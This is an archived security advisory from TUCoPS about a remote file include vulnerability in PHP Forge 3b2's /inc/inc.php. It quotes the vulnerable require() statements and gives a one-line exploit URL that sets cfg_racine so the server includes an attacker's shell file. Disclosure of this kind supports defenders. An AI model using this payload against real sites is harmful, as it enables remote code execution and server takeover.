TUCoPS :: Web :: PHP :: b06-5266.htm

PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability



PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############

Source Code:
http://www.comscripts.com/jump.php?action=script&id=697 
############

Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############

Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt? 
############

Discoverd By :  Mahmood_ali
Conatact : mah_k_2000@hotmail.com 
############

Special Greetings :_ Tryag-Team
############

bugtraq@securityfocus.com 

submit@milw0rm.com 

_________________________________________________________________
The new Windows Live Toolbar helps you guard against viruses 
http://toolbar.live.com/?mkt=en-gb 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH